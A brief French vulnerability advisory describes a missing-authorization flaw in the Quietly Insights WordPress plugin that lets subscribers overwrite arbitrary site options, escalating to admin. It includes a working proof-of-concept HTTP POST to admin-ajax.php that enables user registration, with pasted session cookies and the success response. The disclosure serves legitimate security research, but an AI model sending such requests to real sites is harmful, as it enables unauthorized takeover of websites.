
Quietly Insights <= 1.2.2 - Absence d'autorisation pour une mise à jour arbitraire des options par un utilisateur authentifié (Subscriber+)
Quietly Insights <= 1.2.2 - Absence d'autorisation à une mise à jour d'options arbitraires par un utilisateur authentifié (Abonné+)
Le plugin Quietly Insights pour WordPress est vulnérable à une modification non autorisée des données pouvant conduire à une escalade de privilèges en raison d'une absence de vérification de capacité sur une fonction dans toutes les versions jusqu'à 1.2.2 inclus. Cela permet à des attaquants authentifiés, avec un accès de niveau Abonné ou supérieur, de mettre à jour des options arbitraires sur le site WordPress. Cela peut être exploité pour définir le rôle par défaut pour l'enregistrement en tant qu'administrateur et activer l'enregistrement des utilisateurs afin que les attaquants puissent obtenir un accès utilisateur administratif à un site vulnérable.
modifiez les cookies par les vôtres.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C31038bfa66d0777c50fba66263f613d288a20d1e14dfc0fc06903f77d1c9e41f; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wp-settings-time-1=1734520301; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C987ff9134b881efe3cced2fa12593fd0ba5b2b02613fb93f48433b112015551a; PHPSESSID=49f0a4bfb294cad31ed4a83ede9bf485; tk_ai=zv7IX5yQT%2F6RzXuKQwqmMvEV; th_shop_mania_thms_time=1735227350366; tk_qs=
action=save_qap_id&option=users_can_register&new_value=1
{"option was":"users_can_register","value was":"1","success":true,"message":"Database updated successfully."}